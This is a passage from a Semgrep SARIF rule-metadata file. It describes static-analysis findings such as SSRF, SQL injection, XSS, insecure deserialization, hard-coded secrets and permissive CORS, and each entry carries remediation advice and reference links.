input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp","id":"python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp","name":"python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.net.tainted-fastapi-http-request-aiohttp.tainted-fastapi-http-request-aiohttp"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application appears to have disabled the cookie encryption middleware which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. You can prevent this vulnerability by encrypting cookies if you use them to handle sessions or storing sensitive data. To enable the cookie encryption middleware add `\\$APP\\Http\\Middleware\\EncryptCookies` to the middleware group in your `$APP\\Http\\Kernel` class."},"help":{"markdown":"The application appears to have disabled the cookie encryption middleware which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. You can prevent this vulnerability by encrypting cookies if you use them to handle sessions or storing sensitive data. To enable the cookie encryption middleware add `\\$APP\\Http\\Middleware\\EncryptCookies` to the middleware group in your `$APP\\Http\\Kernel` class.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted)\n - [https://laravel.com/docs/9.x/responses#cookies-and-encryption](https://laravel.com/docs/9.x/responses#cookies-and-encryption)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#cookie-security-and-session-management](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#cookie-security-and-session-management)\n","text":"The application appears to have disabled the cookie encryption middleware which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. You can prevent this vulnerability by encrypting cookies if you use them to handle sessions or storing sensitive data. To enable the cookie encryption middleware add `\\$APP\\Http\\Middleware\\EncryptCookies` to the middleware group in your `$APP\\Http\\Kernel` class."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted","id":"php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted","name":"php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-cookie-not-encrypted.laravel-cookie-not-encrypted"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret","id":"javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret","name":"javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.mongodb.node-mongodb-hardcoded-secret.node-mongodb-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found an initialization of the Intercom Messenger that identifies a User, but does not specify a `user_hash`. This configuration allows users to impersonate one another. See the Intercom Identity Verification docs for more context https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile"},"help":{"markdown":"Found an initialization of the Intercom Messenger that identifies a User, but does not specify a `user_hash`. This configuration allows users to impersonate one another. See the Intercom Identity Verification docs for more context https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash)\n - [https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile](https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile)\n","text":"Found an initialization of the Intercom Messenger that identifies a User, but does not specify a `user_hash`. This configuration allows users to impersonate one another. See the Intercom Identity Verification docs for more context https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile"},"helpUri":"https://semgrep.dev/r/javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash","id":"javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash","name":"javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.intercom.security.audit.intercom-settings-user-identifier-without-user-hash.intercom-settings-user-identifier-without-user-hash"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead."},"help":{"markdown":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion)\n - [https://cwe.mitre.org/data/definitions/704.html](https://cwe.mitre.org/data/definitions/704.html)\n","text":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion","id":"kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion","name":"kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion","properties":{"precision":"very-high","tags":["CWE-704: Incorrect Type Conversion or Cast","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.bad-hexa-conversion.bad-hexa-conversion"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.sqlx.mysql-connection-url.mysql-connection-url)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.sqlx.mysql-connection-url.mysql-connection-url","id":"rust.secrets.sqlx.mysql-connection-url.mysql-connection-url","name":"rust.secrets.sqlx.mysql-connection-url.mysql-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.sqlx.mysql-connection-url.mysql-connection-url"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Mass assignment or Autobinding vulnerability in code allows an attacker to execute over-posting attacks, which could create a new parameter in the binding request and manipulate the underlying object in the application."},"help":{"markdown":"Mass assignment or Autobinding vulnerability in code allows an attacker to execute over-posting attacks, which could create a new parameter in the binding request and manipulate the underlying object in the application.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.audit.mass-assignment.mass-assignment)\n - [https://cwe.mitre.org/data/definitions/915.html](https://cwe.mitre.org/data/definitions/915.html)\n - [https://github.com/OWASP/API-Security/blob/master/2019/en/src/0xa6-mass-assignment.md](https://github.com/OWASP/API-Security/blob/master/2019/en/src/0xa6-mass-assignment.md)\n","text":"Mass assignment or Autobinding vulnerability in code allows an attacker to execute over-posting attacks, which could create a new parameter in the binding request and manipulate the underlying object in the application."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.audit.mass-assignment.mass-assignment","id":"csharp.dotnet.security.audit.mass-assignment.mass-assignment","name":"csharp.dotnet.security.audit.mass-assignment.mass-assignment","properties":{"precision":"very-high","tags":["CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes","MEDIUM CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.audit.mass-assignment.mass-assignment"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests","id":"python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests","name":"python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a template variable used in an anchor tag with the 'href' attribute. This allows a malicious actor to input the 'javascript:' URI and is subject to cross- site scripting (XSS) attacks. If using a relative URL, start with a literal forward slash and concatenate the URL, like this: href='/<%= link =>'. You may also consider setting the Content Security Policy (CSP) header."},"help":{"markdown":"Detected a template variable used in an anchor tag with the 'href' attribute. This allows a malicious actor to input the 'javascript:' URI and is subject to cross- site scripting (XSS) attacks. If using a relative URL, start with a literal forward slash and concatenate the URL, like this: href='/<%= link =>'. You may also consider setting the Content Security Policy (CSP) header.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.var-in-href.var-in-href)\n - [https://flask.palletsprojects.com/en/1.1.x/security/#cross-site-scripting-xss#:~:text=javascript:%20URI](https://flask.palletsprojects.com/en/1.1.x/security/#cross-site-scripting-xss#:~:text=javascript:%20URI)\n - [https://github.com/pugjs/pug/issues/2952](https://github.com/pugjs/pug/issues/2952)\n","text":"Detected a template variable used in an anchor tag with the 'href' attribute. This allows a malicious actor to input the 'javascript:' URI and is subject to cross- site scripting (XSS) attacks. If using a relative URL, start with a literal forward slash and concatenate the URL, like this: href='/<%= link =>'. You may also consider setting the Content Security Policy (CSP) header."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.var-in-href.var-in-href","id":"ruby.rails.security.audit.xss.templates.var-in-href.var-in-href","name":"ruby.rails.security.audit.xss.templates.var-in-href.var-in-href","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.templates.var-in-href.var-in-href"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This code contains bidirectional (bidi) characters. While this is useful for support of right-to-left languages such as Arabic or Hebrew, it can also be used to trick language parsers into executing code in a manner that is different from how it is displayed in code editing and review tools. If this is not what you were expecting, please review this code in an editor that can reveal hidden Unicode characters."},"help":{"markdown":"This code contains bidirectional (bidi) characters. While this is useful for support of right-to-left languages such as Arabic or Hebrew, it can also be used to trick language parsers into executing code in a manner that is different from how it is displayed in code editing and review tools. If this is not what you were expecting, please review this code in an editor that can reveal hidden Unicode characters.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.unicode.security.bidi.contains-bidirectional-characters)\n - [https://trojansource.codes/](https://trojansource.codes/)\n","text":"This code contains bidirectional (bidi) characters. While this is useful for support of right-to-left languages such as Arabic or Hebrew, it can also be used to trick language parsers into executing code in a manner that is different from how it is displayed in code editing and review tools. If this is not what you were expecting, please review this code in an editor that can reveal hidden Unicode characters."},"helpUri":"https://semgrep.dev/r/generic.unicode.security.bidi.contains-bidirectional-characters","id":"generic.unicode.security.bidi.contains-bidirectional-characters","name":"generic.unicode.security.bidi.contains-bidirectional-characters","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: generic.unicode.security.bidi.contains-bidirectional-characters"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.deserialization.tainted-dill-django.tainted-dill-django)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://dill.readthedocs.io/en/latest/index.html](https://dill.readthedocs.io/en/latest/index.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pypi.org/project/dill/](https://pypi.org/project/dill/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"helpUri":"https://semgrep.dev/r/python.django.deserialization.tainted-dill-django.tainted-dill-django","id":"python.django.deserialization.tainted-dill-django.tainted-dill-django","name":"python.django.deserialization.tainted-dill-django.tainted-dill-django","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.deserialization.tainted-dill-django.tainted-dill-django"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.pgx.pgx-empty-password.pgx-empty-password)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.pgx.pgx-empty-password.pgx-empty-password","id":"go.secrets.pgx.pgx-empty-password.pgx-empty-password","name":"go.secrets.pgx.pgx-empty-password.pgx-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.pgx.pgx-empty-password.pgx-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected wildcard access granted to sts:AssumeRole. This means anyone with your AWS account ID and the name of the role can assume the role. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::root`."},"help":{"markdown":"Detected wildcard access granted to sts:AssumeRole. This means anyone with your AWS account ID and the name of the role can assume the role. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::root`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/json.aws.security.wildcard-assume-role.wildcard-assume-role)\n - [https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/](https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/)\n","text":"Detected wildcard access granted to sts:AssumeRole. This means anyone with your AWS account ID and the name of the role can assume the role. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::root`."},"helpUri":"https://semgrep.dev/r/json.aws.security.wildcard-assume-role.wildcard-assume-role","id":"json.aws.security.wildcard-assume-role.wildcard-assume-role","name":"json.aws.security.wildcard-assume-role.wildcard-assume-role","properties":{"precision":"very-high","tags":["CWE-250: Execution with Unnecessary Privileges","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: json.aws.security.wildcard-assume-role.wildcard-assume-role"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions."},"help":{"markdown":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.php-permissive-cors.php-permissive-cors)\n - [https://developer.mozilla.org/ru/docs/Web/HTTP/Headers/Access-Control-Allow-Origin](https://developer.mozilla.org/ru/docs/Web/HTTP/Headers/Access-Control-Allow-Origin)\n","text":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions."},"helpUri":"https://semgrep.dev/r/php.lang.security.php-permissive-cors.php-permissive-cors","id":"php.lang.security.php-permissive-cors.php-permissive-cors","name":"php.lang.security.php-permissive-cors.php-permissive-cors","properties":{"precision":"very-high","tags":["CWE-346: Origin Validation Error","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.php-permissive-cors.php-permissive-cors"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Make sure that unverified user data can not reach `sandbox`."},"help":{"markdown":"Make sure that unverified user data can not reach `sandbox`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Make sure that unverified user data can not reach `sandbox`."},"helpUri":"https://semgrep.dev/r/javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection","id":"javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection","name":"javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Don’t manually concatenate values to a query, use SQLBuilder instead to avoid SQL injection."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Don’t manually concatenate values to a query, use SQLBuilder instead to avoid SQL injection.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.db.sqlobject-flask.sqlobject-flask)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://sqlobject.org/SQLBuilder.html](https://sqlobject.org/SQLBuilder.html)\n - [https://sqlobject.org/SQLObject.html](https://sqlobject.org/SQLObject.html)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Don’t manually concatenate values to a query, use SQLBuilder instead to avoid SQL injection."},"helpUri":"https://semgrep.dev/r/python.flask.db.sqlobject-flask.sqlobject-flask","id":"python.flask.db.sqlobject-flask.sqlobject-flask","name":"python.flask.db.sqlobject-flask.sqlobject-flask","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.db.sqlobject-flask.sqlobject-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Missing mutex unlock (`$T` variable) before returning from a function. This could result in panics resulting from double lock operations"},"help":{"markdown":"Missing mutex unlock (`$T` variable) before returning from a function. This could result in panics resulting from double lock operations\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.go.missing-unlock-before-return.missing-unlock-before-return)\n - [https://pkg.go.dev/sync#Mutex](https://pkg.go.dev/sync#Mutex)\n - [https://blog.trailofbits.com/2020/06/09/how-to-check-if-a-mutex-is-locked-in-go/](https://blog.trailofbits.com/2020/06/09/how-to-check-if-a-mutex-is-locked-in-go/)\n","text":"Missing mutex unlock (`$T` variable) before returning from a function. This could result in panics resulting from double lock operations"},"helpUri":"https://semgrep.dev/r/trailofbits.go.missing-unlock-before-return.missing-unlock-before-return","id":"trailofbits.go.missing-unlock-before-return.missing-unlock-before-return","name":"trailofbits.go.missing-unlock-before-return.missing-unlock-before-return","properties":{"precision":"very-high","tags":["CWE-667: Improper Locking","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.go.missing-unlock-before-return.missing-unlock-before-return"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted user input in {url: ...} can result in Open Redirect vulnerability."},"help":{"markdown":"Untrusted user input in {url: ...} can result in Open Redirect vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Untrusted user input in {url: ...} can result in Open Redirect vulnerability."},"helpUri":"https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect","id":"typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect","name":"typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect","properties":{"precision":"very-high","tags":["CWE-601: URL Redirection to Untrusted Site ('Open Redirect')","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Generic Secret detected"},"help":{"markdown":"Generic Secret detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-generic-secret.detected-generic-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Generic Secret detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-generic-secret.detected-generic-secret","id":"generic.secrets.security.detected-generic-secret.detected-generic-secret","name":"generic.secrets.security.detected-generic-secret.detected-generic-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-generic-secret.detected-generic-secret"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS. If this wasn't intentional, it's recommended to set the Secure flag to true so the cookie will always be sent over HTTPS. A secure default approach would consist of creating a custom response 